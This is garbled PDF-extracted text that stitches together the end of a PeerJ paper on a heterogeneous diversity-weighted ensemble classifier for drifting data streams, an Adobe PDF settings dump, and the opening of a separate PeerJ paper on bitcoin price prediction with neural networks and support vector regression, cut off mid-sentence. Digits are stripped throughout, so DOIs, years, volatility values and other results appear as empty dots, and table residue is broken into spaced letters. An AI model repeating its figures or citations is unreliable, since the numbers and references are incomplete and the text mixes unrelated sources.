. . . . . . . . . . . . l e d . . , . , . , . , . , . , . , . , . , . , . . m ix e d _ b a l a n c e d , . . . , . . , . , . , . , . , . , . . , . m ix e d _ im b a l a n c e d , . . . , . , . , . , . , . , . . , . , . , . r b f , . , . , . , . , . , . , . , . , . , . , . , . , . r b f _ d r if t , . , . , . , . , . , . , . , . , . , . , . , . , . w a v e f o r m , . , . , . , . , . , . , . , . , . , . , . , . , . w a v e f o r m _ d r if t , . , . , . , . , . , . , . , . , . , . , . , . , . m em o ry e l e c , , , , , , , k d d , , , , , , , , , , , , a ir l , , , , , , , c o v t , , , , , , , , , , , sh u t t l e , , , , , , p o w e r su p l y , , , , , c o n n e c t , , , , , , , , , b n g _ b r id g e s , , , , , , , , , b n g _ b r id g e s vs a ll , , , , , , , b n g _ h e p a t it is , , , , , , , , , b n g _ z o o , , , , , , , , , b n g _ l y m p h , , , , , , , , a g r a , , , , , , a g r g , , , , , , se a a , , , , , , , se a g , , , , , , , st g r , , , , l e d , , , , , , , , , , m ix e d _ b a l a n c e d , , , , , , m ix e d _ im b a l a n c e d , , , , , , r b f , , , , , , r b f _ d r if t , , , , , , , w a v e f o r m , , , , , , , , , w a v e f o r m _ d r if t , , , , , , , , , sarnovsky and kolarik ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ddcw ensemble, the performance results were better on many of the datasets. on the other hand, heterogeneous ddcw model provided a small decrease of the performance, but in most of the cases, inclusion of a naive bayes base learner led to a shorter training times and reduced memory usage (most significantly on e.g., waveform data, where the training time was reduced to a half of the total training time of the homogeneous ddcw ensemble). when taking into consideration both aspects, ddcw model can, in some cases present a compromise between performance and resource requirements. although online boosting or ozabagging model performs with higher degrees of accuracy on some of the datasets, their computational intensiveness and more extended training and scoring times may be a factor to consider a simpler model. similarly, arf and kue models provide superior performance on the majority of the datasets. when compared to those state of the art methods, ddcw method produced mostly comparable results, but needed less training time with lesser memory requirements (especially on the larger synthetic data streams) than arf method. ddcw ensemble, in this case, may offer a reasonable alternative by providing a well-performing model, while maintaining reasonable requirements on run-time. conclusions in the presented paper, we propose a heterogeneous adaptive ensemble classifier with a dynamic weighting scheme based on the diversity of its base classifiers. the algorithm was evaluated on a wide range of datasets, including real and synthetic ones, with different types of concept drift. during the experiments, we compared the proposed method with several other adaptive ensemble methods. the results proved that the proposed model is able to adapt to drift occurrence relatively fast and is able to achieve at least comparable performance to the existing approaches, on both real and synthetically generated datasets. while still performing well, the model also manages to maintain reasonable resource requirements in terms of memory consumption and time needed to score the unknown samples. the proposed approach is also dependent on chunk size parameter setting, as the performance of the model on certain datasets change significantly with different chunk sizes. further research with adaptive heterogeneous ensemble models may lead to an exploration of modifications to weighting schemes that improve performance in multi-class classification problems or classifications of heavy imbalanced data. another interesting field for future work is the integration of adaptation mechanisms with semantic models of the application domain. a domain knowledge model could provide a description of the data, the essential domain concepts, and their relationships. such a model could also be used to improve classification performance by capturing expert domain knowledge and utilizing it in the process of classification of unknown samples. a knowledge model could be used to extract new expert features not previously contained in the data or to extract interesting trends present in the data stream. such extensions could represent expert knowledge and could thus be leveraged to detect frequent patterns leading to concept drift while reducing the time normally needed to adapt the models with that knowledge. sarnovsky and kolarik ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ additional information and declarations funding the work was supported by the slovak research and development agency under the contract no. apvv- - knowledge-based approaches for intelligent analysis. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: slovak research and development agency: apvv- - . competing interests the authors declare that they have no competing interests. author contributions � martin sarnovsky conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � michal kolarik conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: source codes of the model is available at github: https://github.com/miso-k/ddcw. references abassi ms. . diversity of ensembles for data stream classification. arxiv. available at https://arxiv.org/abs/ . . agrawal r, imieliński t, swami a. . mining association rules between sets of items in large databases. acm sigmod record ( ): – . baena-garcía m, del campo-Ávila j, fidalgo r, bifet a, gavaldà r, morales-bueno r. . early drift detection method. in: th ecml pkdd international workshop on knowledge discovery from data streams. barddal jp, gomes hm, enembreck f, pfahringer b. . a survey on feature drift adaptation: definition, benchmark, challenges and future directions. journal of systems and software ( ): – doi . /j.jss. . . . bifet a, de francisci morales g, read j, holmes g, pfahringer b. . efficient online evaluation of big data stream classifiers. in: proceedings of the acm sigkdd international conference on knowledge discovery and data mining. new york: acm. bifet a, gavaldà r. . learning from time-changing data with adaptive windowing. in: proceedings of the th siam international conference on data mining. – . sarnovsky and kolarik ( ), peerj comput. sci., doi . /peerj-cs. / https://github.com/miso-k/ddcw https://arxiv.org/abs/ . http://dx.doi.org/ . /j.jss. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ bischl b, casalicchio g, feurer m, hutter f, lang m, mantovani rg, van rijn jn, vanschoren j. . openml benchmarking suites. arxiv. available at https://arxiv.org/abs/ . . black m, hickey r. . learning classification rules for telecom customer call data under concept drift. soft computing : – . blackard ja. . comparison of neural networks and discriminant analysis in predicting forest cover types. phd thesis, colorado state university, fort collins, co, usa. breiman l. . bagging predictors. machine learning : – machine learning. breiman l. . random forests. machine learning : – . brzeziński d, stefanowski j. . accuracy updated ensemble for data streams with concept drift. lecture notes in computer science lnai(part ): – . brzezinski d, stefanowski j. . ensemble diversity in evolving data streams. in: lecture notes in computer science. vol. . cham: springer doi . / - - - - _ . cano a, krawczyk b. . kappa updated ensemble for drifting data stream mining. machine learning : – . carney jg, cunningham p. . tuning diversity in bagged ensembles. international journal of neural systems ( ): – . cassidy ap, deviney fa. . calculating feature importance in data streams with concept drift using online random forest. in: proceedings— ieee international conference on big data. piscataway: ieee. chiang rd, wang yh, chu hc. . prediction of members’ return visit rates using a time factor. electronic commerce research and applications ( ): – . delany sj, cunningham p, tsymbal a, coyle l. . a case-based technique for tracking concept drift in spam filtering. in: knowledge-based systems. ditzler g, roveri m, alippi c, polikar r. . learning in nonstationary environments: a survey. ieee computational intelligence magazine ( ): – . fernández a, garcía s, galar m, prati rc, krawczyk b, herrera f. . learning from imbalanced data sets. berlin: springer. fernandez-aleman jl, carrillo-de-gea jm, hosni m, idri a, garcia-mateos g. . homogeneous and heterogeneous ensemble classification methods in diabetes disease: a review. in: proceedings of the annual international conference of the ieee engineering in medicine and biology society, embs. piscataway: ieee. freund y, schapire re. . experiments with a new boosting algorithm. in: proceedings of the th international conference on machine learning. frías-blanco i, verdecia-cabrera a, ortiz-díaz a, carvalho a. . fast adaptive stacking of ensembles. in: proceedings of the acm symposium on applied computing. gama j. . knowledge discovery from data streams. first edition. london: chapman & hall/ crc. gama j, aguilar-ruiz j, klinkenberg r. . knowledge discovery from data streams. intelligent data analysis ( ): – doi . /ida- - . gama j, medas p, castillo g, rodrigues p. . learning with drift detection. in: lecture notes in computer science. vol. . berlin: springer doi . / - - - - _ . gama j, zliobaite i, bifet a, pechenizkiy m, bouchachia a. . a survey on concept drift adaptation. acm computing surveys ( ) doi . / . ghaderi zefrehi h, altınçay h. . imbalance learning using heterogeneous ensembles. expert systems with applications : . sarnovsky and kolarik ( ), peerj comput. sci., doi . /peerj-cs. / https://arxiv.org/abs/ . http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /ida- - http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ gomes hm, bifet a, read j, barddal jp, enembreck f, pfharinger b, holmes g, abdessalem t. . adaptive random forests for evolving data stream classification. machine learning ( – ): – doi . /s - - - . gonçalves pm, de carvalho santos sg, barros rs, vieira dc. . a comparative study on concept drift detectors. expert systems with applications ( ): – . gordon ad, breiman l, friedman jh, olshen ra, stone cj. . classification and regression trees. biometrics ( ): doi . / . harries m. . splice- comparative evaluation: electricity pricing. technical report, university of new south wales, school of computer science and engineering. idrees mm, minku ll, stahl f, badii a. . a heterogeneous online learning ensemble for non-stationary environments. knowledge-based systems ( ): doi . /j.knosys. . . junior b, nicoletti mdc. . an iterative boosting-based ensemble for streaming data classification. information fusion : – . khamassi i, sayed-mouchaweh m, hammami m, ghédira k. . a new combination of diversity techniques in ensemble classifiers for handling complex concept drift. learning from data streams in evolving environments (august ): – . kolter jz, maloof ma. . dynamic weighted majority: an ensemble method for drifting concepts. journal of machine learning research : – . krawczyk b, minku ll, gama j, stefanowski j, woźniak m. . ensemble learning for data stream analysis: a survey. information fusion : – . kuncheva l. . ten measures of diversity in classifier ensembles: limits for two classifiers. in: a dera/iee workshop on intelligent sensor processing (ref. no. / ), birmingham, uk. piscataway: ieee doi . /ic: . kuncheva li, whitaker cj. . measures of diversity in classifier ensembles and their relationship with the ensemble accuracy. machine learning : – . large j, lines j, bagnall aj. . the heterogeneous ensembles of standard classification algorithms (hesca): the whole is greater than the sum of its parts. corr. arxiv. available at https://arxiv.org/abs/ . v . li ct, shan mk, jheng sh, chou kc. . exploiting concept drift to predict popularity of social multimedia in microblogs. information sciences : – . lifna cs, vijayalakshmi m. . identifying concept-drift in twitter streams. procedia computer science : – . lin cc, deng dj, kuo ch, chen l. . concept drift detection and adaption in big imbalance industrial iot data using an ensemble learning method of offline classifiers. ieee access : – . liu s, feng l, wu j, hou g, han g. . concept drift detection for data stream learning based on angle optimized global embedding and principal component analysis in sensor networks. computers and electrical engineering ( ): – doi . /j.compeleceng. . . . lo yy, liao w, chang cs, lee yc. . temporal matrix factorization for tracking concept drift in individual user preferences. ieee transactions on computational social systems ( ): – doi . /tcss. . . luong av, nguyen tt, liew aw-c. . streaming active deep forest for evolving data stream classification. available at https://arxiv.org/abs/ . . sarnovsky and kolarik ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / http://dx.doi.org/ . /j.knosys. . http://dx.doi.org/ . /ic: https://arxiv.org/abs/ . v http://dx.doi.org/ . /j.compeleceng. . . http://dx.doi.org/ . /tcss. . https://arxiv.org/abs/ . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ lysiak r, kurzynski m, woloszynski t. . optimal selection of ensemble classifiers using measures of competence and diversity of base classifiers. neurocomputing : – doi . /j.neucom. . . . marrón d, ayguadé e, herrero jr, bifet a. . resource-aware elastic swap random forest for evolving data streams. arxiv. available at https://arxiv.org/abs/ . . minku ll, white ap, yao x. . the impact of diversity on online ensemble learning in the presence of concept drift. ieee transactions on knowledge and data engineering ( ): – doi . /tkde. . . montiel j, mitchell r, frank e, pfahringer b, abdessalem t, bifet a. . adaptive xgboost for evolving data streams. available at https://arxiv.org/abs/ . . montiel j, read j, bifet a, abdessalem t. . scikit-multiflow: a multi-output streaming framework. journal of machine learning research ( ): – . muhlbaier m, topalis a, polikar r. . learn++.mt: a new approach to incremental learning. in: roli f, kittler j, windeatt t, eds. multiple classifier systems. berlin: springer, – . mukkavilli sk, shetty s. . mining concept drifting network traffic in cloud computing environments. in: proceedings— th ieee/acm international symposium on cluster, cloud and grid computing. piscataway: ieee. nguyen hl, woon yk, ng wk, wan l. . heterogeneous ensemble for feature drifts in data streams. in: lecture notes in computer science. vol. . berlin: springer doi . / - - - - _ . nick street w, kim ys. . a streaming ensemble algorithm (sea) for large-scale classification. in: proceedings of the seventh acm sigkdd international conference on knowledge discovery and data mining. olorunnimbe mk, viktor hl, paquet e. . dynamic adaptation of online ensembles for drifting data streams. journal of intelligent information systems ( ): – doi . /s - - - . oza nc. . online bagging and boosting. in: conference proceedings—ieee international conference on systems, man and cybernetics. piscataway: ieee. oza nc, russell s. . experimental comparisons of online and batch versions of bagging and boosting. in: proceedings of the seventh acm sigkdd international conference on knowledge discovery and data mining. new york: acm. pesaranghader a, viktor h, paquet e. . reservoir of diverse adaptive learners and stacking fast hoeffding drift detection methods for evolving data streams. machine learning : – . polikar r, upda l, upda ss, honavar v. . learn++: an incremental learning algorithm for supervised neural networks. ieee transactions on systems, man, and cybernetics, part c ( ): – doi . / . . pratt kb, tschapek g. . visualizing concept drift. in: proceedings of the acm sigkdd international conference on knowledge discovery and data mining. ren s, liao b, zhu w, li z, liu w, li k. . the gradual resampling ensemble for mining imbalanced data streams with concept drift. neurocomputing (pa): – doi . /j.neucom. . . . ruano-ordás d, fdez-riverola f, méndez jr. . concept drift in e-mail datasets: an empirical study with practical implications. information sciences : – . sagi o, rokach l. . ensemble learning: a survey. wiley interdisciplinary reviews: data mining and knowledge discovery ( ):e . sarnovsky and kolarik ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.neucom. . . https://arxiv.org/abs/ . http://dx.doi.org/ . /tkde. . https://arxiv.org/abs/ . http://dx.doi.org/ . / - - - - _ http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / . http://dx.doi.org/ . /j.neucom. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ schlimmer jc, granger rh. . incremental learning from noisy data. machine learning : – . sidhu p, bhatia mps. . a novel online ensemble approach to handle concept drifting data streams: diversified dynamic weighted majority. international journal of machine learning and cybernetics ( ): – doi . /s - - -x. stiglic g, kokol p. . interpretability of sudden concept drift in medical informatics domain. in: proceedings—ieee international conference on data. mining, icdm. piscataway: ieee. tavallaee m, bagheri e, lu w, ghorbani aa. . a detailed analysis of the kdd cup data set. in: ieee symposium on computational intelligence for security and defense applications, cisda . piscataway: ieee. tsymbal a. . the problem of concept drift: definitions and related work. trinity college dublin: computer science department. tsymbal a, pechenizkiy m, cunningham p, puuronen s. . handling local concept drift with dynamic integration of classifiers: domain of antibiotic resistance in nosocomial infections. in: proceedings—ieee symposium on computer-based medical systems. van rijn jn, holmes g, pfahringer b, vanschoren j. . algorithm selection on data streams. in: džeroski s, panov p, kocev d, todorovski l, eds. discovery science. cham: springer international publishing, – . van rijn jn, holmes g, pfahringer b, vanschoren j. . having a blast: meta-learning and heterogeneous ensembles for data streams. in: proceedings—ieee international conference on data. mining, icdm. piscataway: ieee. van rijn jn, holmes g, pfahringer b, vanschoren j. . the online performance estimation framework: heterogeneous ensemble learning for data streams. machine learning : – . wang b, pineau j. . online ensemble learning for imbalanced data streams, – . available at https://arxiv.org/abs/ . . wang s, minku ll, yao x. . a systematic study of online class imbalance learning with concept drift. in: ieee transactions on neural networks and learning systems. piscataway: ieee. yang l. . classifiers selection for ensemble learning based on accuracy and diversity. procedia engineering ( – ): – doi . /j.proeng. . . . zenisek j, holzinger f, affenzeller m. . machine learning based concept drift detection for predictive maintenance. computers and industrial engineering : doi . /j.cie. . . Žliobaite i. . learning under concept drift: an overview. arxiv. available at https://arxiv.org/abs/ . . Žliobaite i, pechenizkiy m, gama j. . an overview of concept drift applications. big data analysis: new algorithms for a new society : – . sarnovsky and kolarik ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s - - -x https://arxiv.org/abs/ . http://dx.doi.org/ . /j.proeng. . . http://dx.doi.org/ . /j.cie. . https://arxiv.org/abs/ . https://peerj.com/computer-science/ http://dx.doi.org/ . /peerj-cs. classification of the drifting data streams using heterogeneous diversified dynamic class-weighted ensemble introduction background related work ddcw ensemble method datasets description experimental results conclusions references << /ascii encodepages false /allowtransparency false /autopositionepsfiles true /autorotatepages /none /binding /left /calgrayprofile (dot gain %) /calrgbprofile (srgb iec - . ) /calcmykprofile (u.s. web coated \ swop\ v ) /srgbprofile (srgb iec - . ) /cannotembedfontpolicy /warning /compatibilitylevel . /compressobjects /off /compresspages true /convertimagestoindexed true /passthroughjpegimages true /createjobticket false /defaultrenderingintent /default /detectblends true /detectcurves . /colorconversionstrategy /leavecolorunchanged /dothumbnails false /embedallfonts true /embedopentype false /parseiccprofilesincomments true /embedjoboptions true /dscreportinglevel /emitdscwarnings false /endpage - /imagememory /lockdistillerparams false /maxsubsetpct /optimize true /opm /parsedsccomments true /parsedsccommentsfordocinfo true /preservecopypage true /preservedicmykvalues true /preserveepsinfo true /preserveflatness true /preservehalftoneinfo false /preserveopicomments false /preserveoverprintsettings true /startpage /subsetfonts true /transferfunctioninfo /apply /ucrandbginfo /preserve /useprologue false /colorsettingsfile (none) /alwaysembed [ true ] /neverembed [ true ] /antialiascolorimages false /cropcolorimages true /colorimageminresolution /colorimageminresolutionpolicy /ok /downsamplecolorimages false /colorimagedownsampletype /average /colorimageresolution /colorimagedepth /colorimagemindownsampledepth /colorimagedownsamplethreshold . /encodecolorimages true /colorimagefilter /flateencode /autofiltercolorimages false /colorimageautofilterstrategy /jpeg /coloracsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /colorimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg coloracsimagedict << /tilewidth /tileheight /quality >> /jpeg colorimagedict << /tilewidth /tileheight /quality >> /antialiasgrayimages false /cropgrayimages true /grayimageminresolution /grayimageminresolutionpolicy /ok /downsamplegrayimages false /grayimagedownsampletype /average /grayimageresolution /grayimagedepth /grayimagemindownsampledepth /grayimagedownsamplethreshold . /encodegrayimages true /grayimagefilter /flateencode /autofiltergrayimages false /grayimageautofilterstrategy /jpeg /grayacsimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /grayimagedict << /qfactor . /hsamples [ ] /vsamples [ ] >> /jpeg grayacsimagedict << /tilewidth /tileheight /quality >> /jpeg grayimagedict << /tilewidth /tileheight /quality >> /antialiasmonoimages false /cropmonoimages true /monoimageminresolution /monoimageminresolutionpolicy /ok /downsamplemonoimages false /monoimagedownsampletype /average /monoimageresolution /monoimagedepth - /monoimagedownsamplethreshold . /encodemonoimages true /monoimagefilter /ccittfaxencode /monoimagedict << /k - >> /allowpsxobjects false /checkcompliance [ /none ] /pdfx acheck false /pdfx check false /pdfxcompliantpdfonly false /pdfxnotrimboxerror true /pdfxtrimboxtomediaboxoffset [ . . . . ] /pdfxsetbleedboxtomediabox true /pdfxbleedboxtotrimboxoffset [ . . . . ] /pdfxoutputintentprofile (none) /pdfxoutputconditionidentifier () /pdfxoutputcondition () /pdfxregistryname () /pdfxtrapped /false /createjdffile false /description << /chs <feff f f fd e b bbe b a b efa ef a fc c a c f f fdb c ad d cf a ef ee f f f c f e ee ca f ad c f b efa > /cht <feff f f e b a d f e efa acb f ef ef c a f c f f e a f ad c cea c a ef ee f f f c f e ee ca f ad c f b f df efa acb ef > /dan <feff e c c e e c f f d f b d e c b c b e e c c b f b c e e e e f d f b d e b e e e f c c f e f e e> /deu <feff e e e c c e e a d c c e f e f d f b d e e c f e e e f b b f d b e e f f d e e a e d f e e c c d f b d e b f e e e d f e f e f f f e e e> /esp <feff c f e f e f d e f f f e d f e c e d f f f d e f f e e e f d e f f f e f c f e f e f f e> /fra <feff c a f f e e e f d e f f e d f e c e d d e e c f d e e e e ea f e f c e f e f e c e e> /ita <feff c a a d f a f e f d e f e d c e d e f f b f e f d e f f e f f e f f e f e e> /jpn <feff ad c cea fa b f f e f c b f f e e b cea b fdd c d e c b af c c d d ea f bf e e f f d eb fc d b e e a d b a f c c f d a a eb f f a f e ee d b f c d e > /kor <feffc c c c c acc a d c ec b c a d cd d d b b d bc f ad c ae c d c c ace d c c b c c c c d f bb c cb c c c d b c b e e c b ac c c c b c bb c cb f bc f f e c c c c d c c c f c c c b b c b e e> /nld (gebruik deze instellingen om adobe pdf-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. de gemaakte pdf-documenten kunnen worden geopend met acrobat en adobe reader . en hoger.) /nor <feff b e e c c e e c e f f d f b d e f b f b c e f b c c f f e d f b d e e b e e e f c c f e c c e e> /ptb <feff c a f e e f f d f d e f f d f c d d f b f f f f e f f d e f f f d f f d f f f f e f f f e> /suo <feff b e e e e e b c b e c f f d f b d e a c b f f e c f a f e e c f d f b d e f e f c c a f e a c c a d d c c e> /sve <feff e e e e e e c c e e e f d c c b f d f b d e f b c b e e c b f f b f b e b d f b d e b e f e f f f e f e e> /enu (use these settings to create adobe pdf documents for quality printing on desktop printers and proofers. created pdf documents can be opened with acrobat and adobe reader . and later.) >> /namespace [ (adobe) (common) ( . ) ] /othernamespaces [ << /asreaderspreads false /cropimagestoframes true /errorcontrol /warnandcontinue /flattenerignorespreadoverrides false /includeguidesgrids false /includenonprinting false /includeslug false /namespace [ (adobe) (indesign) ( . ) ] /omitplacedbitmaps false /omitplacedeps false /omitplacedpdf false /simulateoverprint /legacy >> << /addbleedmarks false /addcolorbars false /addcropmarks false /addpageinfo false /addregmarks false /convertcolors /noconversion /destinationprofilename () /destinationprofileselector /na /downsample bitimages true /flattenerpreset << /presetselector /mediumresolution >> /formelements false /generatestructure true /includebookmarks false /includehyperlinks false /includeinteractive false /includelayers false /includeprofiles true /multimediahandling /useobjectsettings /namespace [ (adobe) (creativesuite) ( . ) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice predictions of bitcoin prices through machine learning based frameworks predictions of bitcoin prices through machine learning based frameworks luisanna cocco, roberto tonelli and michele marchesi department of mathematics and computer science, university of cagliari, cagliari, italy abstract the high volatility of an asset in financial markets is commonly seen as a negative factor. however short-term trades may entail high profits if traders open and close the correct positions. the high volatility of cryptocurrencies, and in particular of bitcoin, is what made cryptocurrency trading so profitable in these last years. the main goal of this work is to compare several frameworks each other to predict the daily closing bitcoin price, investigating those that provide the best performance, after a rigorous model selection by the so-called k-fold cross validation method. we evaluated the performance of one stage frameworks, based only on one machine learning technique, such as the bayesian neural network, the feed forward and the long short term memory neural networks, and that of two stages frameworks formed by the neural networks just mentioned in cascade to support vector regression. results highlight higher performance of the two stages frameworks with respect to the correspondent one stage frameworks, but for the bayesian neural network. the one stage framework based on bayesian neural network has the highest performance and the order of magnitude of the mean absolute percentage error computed on the predicted price by this framework is in agreement with those reported in recent literature works. subjects artificial intelligence, data mining and machine learning keywords machine learning, cryptocurrencies, technical indicators, bayesian neural network introduction unlike the volatility of traditional market assets, the volatility of cryptocurrency markets is very high, and albeit they share the characteristics of traditional stock markets, they are highly unstable. indeed these markets are decentralized and unregulated, and also subject to manipulation. nowadays many are the entrepreneurs who invest in block-chain, the well known technology underlying the most popular cryptocurrencies including bitcoin, and we can expect that this number will grow as the bitcoin utility increases; and many are the people who speculate on the bitcoin price. speculating on the bitcoin market may offer the opportunity to obtain substantial returns, but it may also entail a very high risk. so to judge the best time to enter the market is extremely important in order to get profits and not to lose too much money. the price of bitcoin changes every day, just like the price of fiat currencies. however the bitcoin price changes are on a greater scale than that of the fiat currency changes. as a result to get an idea of the future price trend can be extremely important. to date, several on-line platforms make available several technical analysis tools that allow the bitcoin how to cite this article cocco l, tonelli r, marchesi m. . predictions of bitcoin prices through machine learning based frameworks. peerj comput. sci. :e doi . /peerj-cs. submitted september accepted february published march corresponding author luisanna cocco, cocco@unica.it academic editor ana reyes-menendez additional information and declarations can be found on page doi . /peerj-cs. copyright cocco et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:cocco@�unica.�it https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ speculators to identify trends and market sentiment; the number of the research papers that investigate the future bitcoin price trend is increasing. figures and show the usd/eur and btc/usd currency pairs and their volatility. as a measure of volatility we used the moving standard deviation calculated applying the pandas rolling standard deviation to the logarithmic returns of each just quoted currency pair using a window of days. we computed also the maximum and minimum value of the usd/eur and btc/usd currency pairs’ volatility. the maximum value of the btc/usd volatility is equal to . , whereas the minimum value is equal to . . for usd/eur the maximum value is one order of magnitude lower. it is equal to . whereas the minimum value is equal to . . in this article we propose and study some machine learning based frameworks to forecast bitcoin prices. these frameworks could be used to decide when and how much to invest, and also to build bitcoin trading strategies. the main goal of this work is to analyze the performance of bayesian neural networks (bnn) in predicting the bitcoin prices, and to compare them with those obtained using other kinds of nns, such as the feed forward neural network (ffnn) and the long short term memory neural network (lstmnn). in addition, following the approach proposed in the work by patel et al. ( ), we analyzed whether the performance of the ffnn and lstmnn increases putting each of them in cascade to another ml technique, the so called support vector regression (svr). figure (a) time trend of usd/eur currency pair and (b) its volatility. full-size doi: . /peerj-cs. /fig- cocco et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ let us define, as in the work by patel et al. ( ), the first models just described, bnn, ffnn and lstmnn, as single stage frameworks, and the others, svr+ffnn and svr+lstmnn, as two stages framework. the former predicts the bitcoin price by a single ml technique, the latter instead predicts the bitcoin price by two ml techniques in cascade. all frameworks attempt to predict the bitcoin prices starting from five technical indicators: the simple moving average (sma), the exponential moving average (ema), the momentum (mom), the moving average convergence divergence (macd) and the relative strength index (rsi). hence, starting from the value of these five technical indicators at tth day, the one-stage framework aims to predict the daily closing bitcoin price at (t + n)th day, with n = , n = and n = (see fig. ). instead, in the two stages frameworks the first stage, that is formed by an svr, receives in input the five technical indicators at tth day and predicts the value of the five technical indicators at (t + n)th day; the second stage, that is formed by one of two nns, receives in input the five technical indicators at (t + n)th day and predicts the daily closing price of bitcoin at (t + n)th day , as in the work by patel et al. ( ) (see fig. ). to evaluate the performance of our proposed frameworks, at first we divided the whole data set into train and test set, being the test set equal to % of the whole data set. then, in order to select the best neural network architectures, we calibrated these frameworks applying the k-fold cross-validation method to the train set just mentioned. figure (a) time trend of btc/usd currency pair and (b) its volatility. full-size doi: . /peerj-cs. /fig- as in all supervised learning problems, in our problem there are also input patterns (x) and output patterns (y), and given the input patterns an algorithm learns how to predict the output patterns. we transformed our time series data into a supervised learning problem using the shift() function of the well known python data analysis library, pandas. starting from our time series in input, we created copies of columns of lag observations as well as columns of forecast observations, using as inputs those from tth days to t + (n − )th day and so transforming a time series dataset in a supervised learning format (see brownlee ( a, b) for a detailed description and implementation in python). cocco et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ we selected the best architecture for anns and the best architecture for bnns. once selected the best architectures, analyzing the average across k-folds of the mean absolute percentage error (mape) for each architecture, we trained the best selected architectures on all data set. final results provide a robust estimation of the performance of these architectures, since they are the mape’s average (std) across the several monte carlo runs performed. let us underline that peculiarity of our work is tuning architectures’ hyper parameters by the k-fold cross-validation method, and predicting prices in a young, unstable and immature market such as the cryptocurrency market providing robust results thanks to the monte carlo method applied. note that, we predicted the bitcoin prices and also the ethereum prices applying in both cases the same methodologies. in this first work, due to the computational complexity of some proposed frameworks an exhaustive optimization was not performed. nevertheless, bitcoin price predictions are comparable with those found in literature and proposed frameworks perform well also when applied to the ethereum price prediction. the article is organized as follows. related work describes figure architecture of the one stage framework. full-size doi: . /peerj-cs. /fig- cocco et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ related work; the proposed framework section presents the frameworks proposed in our work for the prediction of bitcoin price, describing the ml techniques used and their inputs, that are the technical indicators mentioned above and that are built starting from the daily closing bitcoin price series; the framework’s calibration and performance metric section illustrates the calibration of the proposed frameworks, the training and testing data sets, and the performance metrics with which the proposed frameworks are evaluated; results presents the results, and finally, conclusions concludes and discusses future works. related work in this work, as already mentioned, the proposed frameworks, and in particular the idea of the approach of one and two stages, stem from the work by patel et al. ( ). in that work, the authors predict the future values of two indian stock market indices, cnx nifty and s&p bombay stock exchange (bse) sensex, by the svr combined with artificial neural network (ann) and random forest (rf) algorithms. they compare the obtained results in these two stages frameworks with those obtained in the single stage frameworks formed each by a single ml technique, ann, rf and svr. contrary to the work by patel et al. ( ), in our work we investigated also the performance of the bnn. the bnns are taken into account in the work by jang & lee ( ) that use blockchain information in order to predict the log price and the log volatility of bitcoin price. in this work, the authors select the relevant inputs studying the multicollinearity problem, and specifically studying for each input the variance inflation factor (vif) value. also in a figure architecture of the two stages framework. full-size doi: . /peerj-cs. /fig- cocco et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ work by mallqui & fernandes ( ) the authors select the relevant inputs for their prediction problem, but the selection of the relevant inputs is done using the correlation analysis, the relief technique, the information gain method, the principal component analysis, and the correlation based feature subset selection. in the work by mallqui & fernandes ( ) the authors predict both the bitcoin price and its movements, hence solve both a classification problem and a regression problem by different ml algorithms, recurrent neural network, tree classifier and the svm algorithm. owing to the low number of inputs taken into account in our work, we did not apply any selection method. we simply evaluated the performance of the proposed frameworks at varying the number of inputs taken into account, finding that the best performance of the bnn is obtained taking into account all five technical indicators. our future work is to investigate the performance of the proposed frameworks under the assumption of a higher number of inputs, which includes also blockchain information, tweet volumes and sentiment analysis. twitter data and google trends data are used by abraham et al. ( ) in order to predict changes in the prices of both bitcoin and ethereum. in this work, the authors predict the direction of price changes by a linear model. in the work by huang, huang & ni ( ) the authors investigated cryptocurrency return predictability, specifically the bitcoin return predictability. they forecast the bitcoin daily return using a tree-based predictive model and technical indicators as input. results showed that their predictive model has strong predictive power and performance higher than those obtained by a buy-and-hold strategy. as a result, work by huang, huang & ni ( ) suggests that in the bitcoin market technical analysis can result useful. a similar result is obtained in the work by cocco, tonelli & marchesi ( ), who simulate the trading of the currency pair btc/usd. they simulate a btc/usd artificial market in which chartists (speculators) trade through the application of trading rules based on technical indicators, and random traders trade without 